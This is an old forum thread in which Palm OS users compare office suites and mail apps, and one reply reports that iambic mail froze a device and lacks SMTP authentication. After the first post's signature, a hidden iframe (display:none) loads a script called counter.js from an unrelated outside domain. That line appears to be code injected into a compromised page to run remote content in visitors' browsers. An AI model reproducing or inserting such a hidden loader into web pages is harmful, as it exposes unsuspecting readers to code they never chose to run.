Question Best Office suite

Hi,

I'm currently using Wordsmith for word processing, Quicksheet for spreadsheet, and Eudora for mail. I was considering trying iambic office (http://www.iambic.com/english/palmos/office/) has anybody had any experience with this?

Thanks,
-Steve<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thumbs down

I recommend you stick with what you have. I tried iambic office as well as quickoffice and Documents to go. FastWriter (iambic word processor) is an ok program, but nowhere near as nice as WordSmith. Although I liked Tinysheet better than Quicksheet, I wouldn't switch just for that. Iambic mail was a real disapointment, especially when I found out that their claim that the program could handle e-mail attachments was an outright lie!!! I recommend you check out iambic's discussion boards. Eudura mail is far superior and free! I definitely don't recommend iambic office and unless you use spreadsheets on your Palm all the time I would stick with Quicksheet.

I was just at the Singapore Airport, where they have free internet access via IR!!! REALLY cool!

Anyway, Iambic mail actually froze my SPH. I had no choice but to do a hard reset which of course erased all my data. Lucky for me I had my laptop along, but I'd have really been in a bad position without it.

In addition, Iambic mail does NOT allow SMTP to authenticate, which makes it pretty much useless.

I've switched back to Eudora and it seems to be working perfectly. Has anybody had a similar experience? I'd ask for my money back, but Tinysheet is too good of a program.
